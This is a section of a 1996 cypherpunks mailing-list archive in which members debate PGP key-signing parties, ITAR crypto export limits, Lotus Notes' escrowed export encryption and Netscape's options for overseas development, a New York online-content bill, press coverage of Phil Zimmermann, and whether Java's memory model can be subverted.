friends and they are usually signed with another nym key.  Kind of a
fictional web of trust...

I normally only sign keys for people I have met and trust to be the
individual with the key claimed.  "True names" and other legal fictions do
not interest me as much as the individuals involved.

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Wed, 24 Jan 1996 14:01:14 +0800
To: Ben <adept@minerva.cis.yale.edu>
Subject: Re: IPSEC == end of firewalls
Message-ID: <9601240513.AA22267@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:56 PM 1/23/96 -0500, Ben <adept@minerva.cis.yale.edu> allegedly wrote:


>Because this has Cpunks relevance in the use of crypto, I'm going to keep 
>it on this list...
>
>> remain relatively secure.  However, I am I'm not saying that adding
>> firewalling capabilities would make the system invincible.  I *am* 
>> saying that it would provide the system with more security than it 
>> currently has and would help to reduce (not eliminate) some risks 
>> associated with networking.  
>
>But what does it mean to add 'firewalling capabilities' to an O/S?  By 
>definition, a firewall is supposed to stop the spread of 'fire' by being 
>the sole mechanism for the interchange of packets.

Essentially, adding protective mechanisms that would filter incoming 
network connections (incoming to the O/S) rendering potential risky
connections harmless or rejecting them.  Steve Bellovin has a very 
well-written paper called "Security Problems in the TCP/IP Protocol
Suite" which addresses a number of these.  If memory serves correctly
at this late hour (midnight), then it can be ftp'ed from research.att.com
and it is in the /pub/dist/smb directory (or somewhere around there).



>If you're referring to making a hardened OS that can protect itself 
>through the use of well written code, memory protections, etc. then, yes 
>by all means add it to your OS, but these shouldn't be luxuries in that 
>they're thought of as 'firewalling' features.  Rather these things should 
>be compulsory in the development of OS's.
>

I agree with you 100%.  Eventually, I think the market will demand it and
the vendors will have to begin delivering hardened O/S's.



>> Of course, it would be terrific if the vendors would produce Operating 
>> Systems which are secure AND usable.  (I think the market will eventually 
>> demand this from vendors, but this probably won't happen in the next year 
>> or two.)
>
>Even if OS's could be secure(lets not get into Orange Book here) they 
>would need constant updating.  Most users have problems printing, let 
>alone installing patches and tweaking afterwards to deal with conflicts.  

Good points.  As stated above, the systems should be secure AND usable.


>And you can't expect IS to micromanage the corporation's entire fleet of 
>machines.

True.  However, the systems can be monitored for compliance to Corporate
Security policies and the non-compliant (read insecure) systems can be
quickly brought back into compliance - frequently using automated scripts.

NOTE:  Implementing a high level of Information Security should be as 
user-friendly, as non-intrusive to business operations as possible, and
as cheaply as possible.  (Yes, it is possible to achieve all three objectives).


>This would be nice, and would be a good start, but like I said above, 
>these things shouldn't be considered to be luxuries.  Rather they should 
>be compulsory.  That doesn't mean that they will obsolete firewalls by 
>any stretch of the imagination.

I agree with you 100%

Nice posting, BTW.  (And not just because I agree with you).  8^)


>Ben.


>(I'm starting to think Frank may have been right to move this to 
>firewalls.  I think I'll crosspost this message too)
>____
>Ben Samman..............................................samman@cs.yale.edu
>"If what Proust says is true, that happiness is the absence of fever, then
>I will never know happiness. For I am possessed by a fever for knowledge,
>experience, and creation."                                      -Anais Nin
>PGP Encrypted Mail Welcomed        Finger samman@suned.cs.yale.edu for key
>Want to hire a soon-to-be college grad? 		Mail me for resume
>
Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800   - http://www.fortified.com/fortified/

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: matts@pi.se
Date: Wed, 24 Jan 1996 09:07:18 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <199601232315.AAA23167@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 11.00 1996-01-23 -0600, Alex Strasheim wrote:
>There's probably a big opportunity here for some enterprising cypherpunk
>who's willing to move to Amsterdam (or who lives there already).  Set up a
>company that provides crypto guts and distribution services for American
>software companies. 

You don't have to. PGP already exists in an international version as well as
a US version. Just make your software call PGP to do all encryption and ask
the user to download PGP from his favorite web site (on his side of the US
border).

matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 24 Jan 1996 16:51:16 +0800
To: perry@piermont.com
Subject: Re: [local] Report on Portland Cpunks meeting
Message-ID: <v02120d5fad2b9e99eb08@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:40 1/23/96, Perry E. Metzger wrote:

>Each person gets a sheet. Either each person in the room reads their
>fingerprint in turn from their own copy, with each person in the room
>checking the read fingerprint against the fingerprint on the handout,
>or an appointed reader (or set of readers at the last IETF) read the
>fingerprints in turn and ask the owner of the key to then simply say
>"yes" or "its mine" or whatever to verify that the fingerprint matches
>their own copy of the print.

How do they verify that the person confirming the fingerprint is indeed the
person supposedly owning the key?


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 24 Jan 1996 17:54:03 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <2.2.32.19960123140650.00708e08@mail.interlog.com>
Message-ID: <3105FBFC.4DC9@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> Herb Sutter writes:
> > >So, Lotus thinks they can fool people by back-dooring in key escrow, eh?
> > >
> > >Time to break out the artillery.
> >
> > Careful... what would YOU have done, with your customers demanding stronger
> > crypto today and you unable to legally give it to them?
> 
> Set up development shop overseas for the crypto plug-ins.
> 
> The solution is obvious and easy.
> 
> By the way, I really think Netscape should simply ship Jeff and other
> people to the Amsterdam office or wherever else seems reasonable and
> do all the crypto work from there. It will save trouble and
> hassle. U.S. citizens wanting full 128 bit over the net would then get
> it from Netscape's overseas download sites. No one anywhere in the
> world would be forced to use crap.

  I can see two practical ways to build a netscape product outside
the US.  The first is to export the source code for the Navigator
with the crypto code removed.  All of the calls to crypto would
have to be removed as well.  I've heard some people claim that the
government could come after us on the grounds that we were taking
part in a conspiracy to export strong crypto.

  The other way would be to export a binary with pluggable crypto,
which is generally agreed to be regulated by the ITAR in the same
way as software that actually contains crypto.

  I suspect that to get around the US government in this way we
would have to develop the entire product outside of the US.  That
would be a very drastic move that is not likely to happen any
time soon.  We are going to invest some money and effort into
trying to get the current restrictions lifted first.

  Of course there are some of us who are ready and willing to go
if it comes to that...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 24 Jan 1996 17:56:14 +0800
To: "Thaddeus J. Beier" <thad@hammerhead.com>
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601240313.TAA02133@hammerhead.com>
Message-ID: <3105FCD1.27FB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Thaddeus J. Beier wrote:
> I think that the real thing
> that's stopping Netscape is the golden government handcuffs, they
> don't want to piss off a big customer.

  I think that the potential sales lost overseas due to weak crypto
could be much bigger than sales to the government.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@vplus.com (Dan Weinstein)
Date: Wed, 24 Jan 1996 21:41:40 +0800
To: Herb Sutter <herbs@connobj.com>
Subject: Re: Blacknet & Lotus Notes
In-Reply-To: <2.2.32.19960123140645.006ce49c@mail.interlog.com>
Message-ID: <31058de2.3338398@mail.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jan 1996 09:06:45 -0500, Herb Sutter <herbs@connobj.com>
wrote:
 
 <quoted material deleted>

>I think people are missing the point... even if we assume the absolute worst
>case, that the private key is broken and becomes publicly available,
>international Notes users are no worse off than before.

True, but they aren't any better off either.  40-bits is not secure,
neither is 64-bits.

>That said, it shouldn't happen soon.  One of the things Ray said in his
>announcement was that the government agreed to both generate and then guard
>this key with the same diligence with which they guard their most important
>secrets (he specifically mentioned nuclear missile controls).  While it
>makes for a nice sound bite, I'm comfortable that there's probably also a
>lot of truth to it.

That just means that it will be classified Top Secret and only those
with a "need to know" will have access.  The government can set the
need to know at any level they want.  Even if they truly try to
restrict access to their key, this does not even imply that they will
not allow it to be freely used.  If I want a message read and am not
cleared for access to the key, I just send it to someone that does.  I
have seen nothing from the government saying that they agree to only
use it if they have a warrant or even any reason to believe that the
message contains data that is important to national interests.  They
are free to decode messages and give the information they obtain to a
competing company.  IBM made the deal to help provide an illusion of
greater security, at least before the insecurity of 40 bits was well
known.  They are actually doing a diservice to their customers by
trying to make them believe that their communitcations are actually
secure using just Notes.  Does the packaging indicate that the U.S.
government has access to more than a third of the key?

Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@vplus.com (Dan Weinstein)
Date: Wed, 24 Jan 1996 12:04:03 +0800
To: perry@piermont.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601231539.KAA10548@jekyll.piermont.com>
Message-ID: <31059274.4508804@mail.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jan 1996 10:39:03 -0500, perry@piermont.com wrote:


>Set up development shop overseas for the crypto plug-ins.
>
>The solution is obvious and easy.
>
>By the way, I really think Netscape should simply ship Jeff and other
>people to the Amsterdam office or wherever else seems reasonable and
>do all the crypto work from there. It will save trouble and
>hassle. U.S. citizens wanting full 128 bit over the net would then get
>it from Netscape's overseas download sites. No one anywhere in the
>world would be forced to use crap.

Wrong, this would be a violation of ITAR.


Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 24 Jan 1996 15:16:59 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Reporting ITAR Violations
In-Reply-To: <9601231353.AA06639@alpha>
Message-ID: <199601240707.CAA02492@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ECafe Anonymous Remailer writes:
# Here is the RC4 cipher for the HP-48 calculator...

Mike McNally writes:
> You know, it'd be interesting to start loudly reporting such obvious
> ITAR violations.  Not, of course, because I feel myself threatened as
> a result of this attack on national security, but because it might
> make life more difficult for Them.  
[...]

I would feel a bit more comfortable if violations by non-anonymous entities
were well publicized. Otherwise, we may force the TLAs to cash in the
"weapons export" card against the anonymizers, and hasten a crackdown on
them. (In this particular instance, the remailer resides outside the ITAR
zone, but that detail could be conveniently ignored in calling for a ban on
U.S. remailers.)  

I'm still hoping for a test of the PA anonymity prohibition.... 

Futplex <futplex@pseudonym.com>, still catching up on last week's mail

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQXagSnaAKQPVHDZAQHZTwf/WrHgbZjgiJIXxW886mKO/E/eoSLh0eSE
IBnfnDABTmAUcbvUEo/UMn7n7Gsq03mJgyo9z1+6SUGxhqt45MV41d7rZQVhkBWs
+woh7YqGIiqGF9elvaVUlp7xsqyKLdXVQYqkahe0M4Ouw7S033HYIC+6lW6kTBeC
C0vOnwyoB82WJ1x2SRH8iz7/lCWJkQkDSiRJ3yaAB4UtXvsikug3ddvOGz2tbL19
sxlxoJslD5MlqcH8ubKqDvHR++N432cOKMOHR82GjAm8b2f4/0lmaDWAxDaaWNFb
jk0EH5Ax8gECoBWl6dw3Sw3asWNbM0M9UIthEmOTjiJoOb9cRxjoNw==
=O3fc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Nobody" <mixmaster@anon.alias.net>
Date: Wed, 24 Jan 1996 17:17:40 +0800
To: zinc@zifi.genetics.utah.edu.cypherpunks@toad.com
Subject: None
In-Reply-To: <Pine.LNX.3.91.960123192018.1008D-100000@zifi.genetics.utah.edu>
Message-ID: <199601240850.CAA06981@fuqua.fiftysix.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.LNX.3.91.960123192018.1008D-100000@zifi.genetics.utah.edu> zinc <zinc@zifi.genetics.utah.edu> writes:

> i got this in the mail this morning.  here's another blatant case 
> of illegal export.  names and exact addresses removed to protect the 
> clueless.

Why exactly did you post this message?  I personally don't mind, but
am just curious.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Wed, 24 Jan 1996 17:26:04 +0800
To: "Lynne L. Harrison" <lharrison@mhv.net>
Subject: Re: NY State to restrinct netporn?!
Message-ID: <199601240918.EAA15158@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote:

>   I heard about it and want to search NY's gopher site for the bill to get
> the exact wording.  Did the article give any more specifics, i.e., who
> proposed it, the specific name of the bill, etc.?

Not much info in the article. It wasn't the central focus... 
actually, the article dealt with the political cynicism of the new 
measures.

More from the article (all that really mentions the bill at all):

    The cyberspace bill, passed by the Senate last week, could make it 
  a felony to have sexually explicit communication with a minor through 
  a computer network, especially if the communication included pictures 
  of sexual activity or an invitation to have sex.

Which doesn't say much about the bills content.  Technically this is 
already illegal, so why pass a cybespce-specific bill? What are the 
responsibilities of publishers, ISPs, SysAdmins, etc.?  What if a 
minor pretentds not to be a minor?

IMO, It sounds like another meaningless bill that looks good on
political mailings...

What's the NYS gopher address again?

Rob.

> At 07:23 AM 1/23/96 +0000, you wrote:
> >This in today's LI Newsday, p. A6:
> >
> >Crime Time in Albany
> >Bills Reflect now popular get-tough stance
> >
> >by Liam Pleven, Albany Bureau
> >
> >   Albany - A bill that would restrict sexually explicit material on 
> >the Internet - which the Assembly took little notice of last year - 
> >is suddenly headed tothe governor's desk after winning legislative 
> >approval yesterday.
> >...
 
--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Jan 1996 19:06:52 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <ad2b4efa0102100435ee@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:29 AM 1/24/96, Jeff Weinstein wrote:

>  I suspect that to get around the US government in this way we
>would have to develop the entire product outside of the US.  That
>would be a very drastic move that is not likely to happen any
>time soon.  We are going to invest some money and effort into
>trying to get the current restrictions lifted first.

For what it's worth, this is what I've heard several knowledgeable lawyers
say is the case, that merely sending the crypto experts abroad is no
solution, that the entire product (or some large fraction of it) must be
foreign-originated.

The usual issue: That if a foreign-originated product even appears to be a
standard (so far, none have been), and includes strong crypto, then the NSA
and other agencies will simply change the rules. Thus, if extremely strong
crypto from "Netscape-Zurich" starts to have a significant market presense
in the U.S., then some law will be passed to restrict it.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Jan 1996 21:00:08 +0800
To: cypherpunks@toad.com
Subject: Re: Philip Zimmermann and the Press
Message-ID: <m0tf4Dt-0008yqC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:46 PM 1/23/96 -0500, Perry E. Metzger wrote:
>
>I contacted Phil about the neo-Nazi attribution in the British
>press. He has apparently contacted the newspaper and it appears that
>they are probably going to print an article retracting their
>statement. I've asked him to comment here but I don't know if he will.
>
>Perry

What _I_ want to see is NOT MERELY an apology and retraction, but ALSO a 
statement of where the hell this claim came from in the  first place.  WHY?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 24 Jan 1996 19:46:45 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Reporting ITAR Violations
Message-ID: <2.2.32.19960124113319.0081a4c4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:07 AM 1/24/96 -0500, Futplex wrote:

>I would feel a bit more comfortable if violations by non-anonymous entities
>were well publicized. Otherwise, we may force the TLAs to cash in the
>"weapons export" card against the anonymizers, and hasten a crackdown on
>them. 

Would that the remailer network were significant enough to call forth a
legislative response.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 24 Jan 1996 23:56:41 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: [local] Report on Portland Cpunks meeting
In-Reply-To: <199601241431.JAA13316@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.960124070149.9398C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Jan 1996, Perry E. Metzger wrote:

> > How do they verify that the person confirming the fingerprint is indeed the
> > person supposedly owning the key?
> 
> Thats up to the people signing. In most cases in that sort of
> environment, you know about 30% of the people in the room, and you
> sign their keys (and no one elses, which is reasonable).

This is pretty much the  pure web-o-trust model - the identity of the 
person is assmed to be known at the start of the process, and what is 
verified is the key- closure gets you the other folks.

I'm usually not to keen on WOT, but if it was an AI project, this is
the example that would be in the writeup :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name Withheld by Request)
Date: Wed, 24 Jan 1996 14:54:40 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <199601240645.HAA10042@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

>> >By the way, I really think Netscape should simply ship Jeff and other
>> >people to the Amsterdam office or wherever else seems reasonable and
>>
>> That won't work -- they gotta hire non-US persons to do the work.
>
>There are plenty of good foreign crypto people.

One of them already has implemented SSL...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 24 Jan 1996 22:27:59 +0800
To: djw@vplus.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601231539.KAA10548@jekyll.piermont.com>
Message-ID: <9601241359.AA07750@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Dan Weinstein writes:
 > >By the way, I really think Netscape should simply ship Jeff and other
 > >people to the Amsterdam office...
 > 
 > Wrong, this would be a violation of ITAR.

I don't understand; are you saying Jeff's brain is a munition under
the ITAR?

(Is it a citizenship thing?  If so, that's an easily solved problem:
hire Dutch (or Egyptian or Bangali or whatever) engineers.)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: heesen@zpr.uni-koeln.de (Rainer Heesen)
Date: Wed, 24 Jan 1996 17:07:39 +0800
To: cypherpunks@toad.com
Subject: Re: Hack Java
In-Reply-To: <199601240433.RAA30064@bats.comp.vuw.ac.nz>
Message-ID: <9601240930.ZM24939@Sysiphos.MI.Uni-Koeln.DE>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 24,  5:33pm, Matthew Sheppard wrote:
> Aside from memory management in java being internal to the virtual
> machine as covered in other posts  Java is a strongly typed language.
> There is no notion of void * (pointers that point to anything) and the
> current implementation ensures the pointer is either null or valid.
>
> Even if you could the current implementation disallows any pointer
> arithmetic at all! i.e no pointer++;
>
>-- End of excerpt from Matthew Sheppard

I think the mentioned security hole is not a source level problem. The question
is how will the Java interpreter act, if there is a patched applet. Is there
any control of pointer assignments?


- Rainer

---

 RAINER HEESEN
 Adresse:    Zentrum fuer Paralleles Rechnen
             Universitaet zu Koeln
             50923 Koeln
 Telefon:    +49 221 470 6021
 Fax:        +49 221 470 5160
 eMail:      heesen@zpr.uni-koeln.de
 WWW:        http://www.zpr.uni-koeln.de/~heesen/








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jan 1996 22:51:07 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: [local] Report on Portland Cpunks meeting
In-Reply-To: <v02120d5fad2b9e99eb08@[192.0.2.1]>
Message-ID: <199601241431.JAA13316@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
> At 16:40 1/23/96, Perry E. Metzger wrote:
> 
> >Each person gets a sheet. Either each person in the room reads their
> >fingerprint in turn from their own copy, with each person in the room
> >checking the read fingerprint against the fingerprint on the handout,
> >or an appointed reader (or set of readers at the last IETF) read the
> >fingerprints in turn and ask the owner of the key to then simply say
> >"yes" or "its mine" or whatever to verify that the fingerprint matches
> >their own copy of the print.
> 
> How do they verify that the person confirming the fingerprint is indeed the
> person supposedly owning the key?

Thats up to the people signing. In most cases in that sort of
environment, you know about 30% of the people in the room, and you
sign their keys (and no one elses, which is reasonable).

In other environments, people could go about afterwards and examine ID
or whatever it would be that they would want to do.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Wed, 24 Jan 1996 17:08:11 +0800
To: Matt Miszewski <crypto@midex.com>
Subject: Re: Hack Java
In-Reply-To: <Pine.3.89.9601240858.A6438-0100000@shaq.midex.com>
Message-ID: <199601240847.JAA08706@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| On Tue, 23 Jan 1996, Benjamin Renaud wrote:
| 
| > Yes. And if you also let an intruder in your house, have them sit at
| > your computer with your newborn child in the room and go on vacation,
| > things can get really, really nasty.
| 
| I guess that wu-ftp never was distributed with security holes.  Never 
| heard of anyone distributing maliscious lookalike packages.  How many 
| folks do you think downloaded the linux-JDK and use it without checking 
| it out first.  That takes care of the compiler.  And distributing bad 
| netscape or other browsers is childs play.  So I guess your newborn is 
| relevant.
| 
| Stick to your belief that Java is secure because, darn it, it just would 
| be hard for anyone to do bad things with it.  Please.

I think what we should worry about is the second-order effects of
Java; how will the world look like when Java is everywhere?

We should also not discount the "social" effects; what will people
do to try to circumvent the "stupid" safeguards that Java will be
distributed with.

I have earlier heard the opinion from the Java team (I believe) that
this is not "Java's fault", and I can understand that standpoint.
My opinion is still that the net result (pun intended!) is even weaker 
security, because of these two reasons above. 

(In my darker moments, I feel that the whole field of computer security
is in a major crisis. Ever heard of the Emperor's New Clothes? ;-))

Just some mumbling from,
	Christian Wettergren




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Wed, 24 Jan 1996 23:55:19 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: SS Obergruppenfuhrer Zimmermann (NOT!)
In-Reply-To: <199601240336.WAA11471@jekyll.piermont.com>
Message-ID: <Pine.OSF.3.91.960124100950.4551A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



If I recall correctly, the Zimmermann Telegram did NOT bring the US into 
the war. It was however one of the many things that lead to a US decision 
to enter the war. In itself it did not cause the US entry.
Just my $0.02
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================



On Tue, 23 Jan 1996, Perry E. Metzger wrote:

> 
> jim bell writes:
> > Maybe this is common knowledge, but the name "Zimmermann" and crypto had 
> > another relationship, in World War I.  If anybody knows more about this 
> > incident than my vague recollection of the famous "Zimmermann cipher" would 
> > you care to tell the story?
> 
> It was the Zimmermann Telegram, actually, and it was a dispatch from
> the Germans to the Mexicans trying to promise them most of the
> southwest in exchange for being allies against the U.S. (which wasn't
> yet in the war). The Brits intercepted and decoded it and released it,
> which forced the U.S. into World War I.
> 
> Perry
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Wed, 24 Jan 1996 14:05:38 +0800
To: cypherpunks@toad.com
Subject: Re: Hack Java
In-Reply-To: <9601231630.AA07540@sulphur.osf.org>
Message-ID: <199601240433.RAA30064@bats.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The shadowy figure took form and announced "I am Rich Salz and I say ...
> Then if I have the code
> 
> 	tricky_pointer = 10000;
> 	for (; tricky_pointer < 50000 ;) {
> 		dumptofile(trick.data)
> 		tricky_pointer += 16;
> 	}

Aside from memory management in java being internal to the virtual
machine as covered in other posts  Java is a strongly typed language.
There is no notion of void * (pointers that point to anything) and the
current implementation ensures the pointer is either null or valid.

Even if you could the current implementation disallows any pointer
arithmetic at all! i.e no pointer++;

Also if the object your pointing at is destroyed your pointer will be
updated to null or you will generate an exception when you next use it
as per the bargabe collection policy.

--Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patiwat Panurach  (akira rising)" <pati@ipied.tu.ac.th>
Date: Wed, 24 Jan 1996 21:30:54 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: SS Obergruppenfuhrer Zimmermann (NOT!)
In-Reply-To: <2.2.32.19960124014532.0095ac74@panix.com>
Message-ID: <Pine.SUN.3.91.960124202201.23791B-100000@ipied>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jan 1996, Duncan Frissell wrote:

> >This act of aggression against cypherpunks, attempts to box us into a 
> >corner. Our enemies want to keep us on the defensive.  
> 
> Phil is not a cypherpunk.  
> 
> On the whole, the cypherpunks have gotten very favorable press for a group
> who's actions may render government policies irrelevant and possibly the
> governments themselves.


Would you call cypherpunks (as a group and as a philosophy) to be
influential?  Do you think governments listen to us much?  Are they forced
to listen to us?  Any stuff to support this?  Please give me your comments.

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Murphy <packrat@ratbox.rattus.uwa.edu.au>
Date: Wed, 24 Jan 1996 21:22:07 +0800
To: cypherpunks@toad.com
Subject: [Ramble] Re: Hassles taking App. Crypt. to Taiwan?
In-Reply-To: <199601221522.XAA29618@relay3.jaring.my>
Message-ID: <199601241311.VAA00525@ratbox.rattus.uwa.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


In message <199601221522.XAA29618@relay3.jaring.my>, 
  Peng-chiew Low wrote:
> >If this were Singapore, they might consider it subversive literature,
> >because it is :-)  
> 
> ...............and the next thing you'll probably say is that Asians live in
> tree houses
> and have pet gorillas or whatever :)......

*puzzled look* They don't?

And before I get totally off topic, on the subject of the Singaporean
government and their attitude to do-what-you-will liberalism (hah!),
just as a bit of noise, what sexual practices are illegal in Singapore?

Now that's *way* off topic, but what is there in the way of
enforcement for said regulations. More specifically, any info
generally on the whole Singapore law-enforcement system. Not of course
the public things, but it's intelligence stuff.

if AC is considered subversive... Mass media has had some interesting
articles about the Singapore govt being a little worried about being
either isolated or forced to abandon their vaunted censorship
role. Article itself was rubbish, but the idea behind it was interesting.

--
Packrat (BSc/BE;COSO;Wombat Admin)
Nihil illegitemi carborvndvm.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Murphy <packrat@ratbox.rattus.uwa.edu.au>
Date: Wed, 24 Jan 1996 22:20:46 +0800
To: cypherpunks@toad.com
Subject: Re: SS Obergruppenfuhrer Zimmermann (NOT!)
In-Reply-To: <2.2.32.19960124014532.0095ac74@panix.com>
Message-ID: <199601241406.WAA00594@ratbox.rattus.uwa.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


In message <2.2.32.19960124014532.0095ac74@panix.com>, 
  Duncan Frissell wrote:
> At 05:11 PM 1/23/96 -0500, Alan Horowitz wrote:
> >The reporter's slander against Zimmerman was not accidental, or the 
> >result of ignorance.  Calling someone a Naxi sympathizer is not something 
> >that one should do without a smoking gun.
> >
> >This act of aggression against cypherpunks, attempts to box us into a 
> >corner. Our enemies want to keep us on the defensive.

"Never attribute to malice that which can be adequately explained by
stupidity" (or journalists) Of course with paranoia being almost
compulsory around here, it's probably a government plot to discredit
all people who want privacy. To be frank I doubt the NSA or anyone
else is going to bother, they can get what they want *anyway*

> 
> Phil is not a cypherpunk.

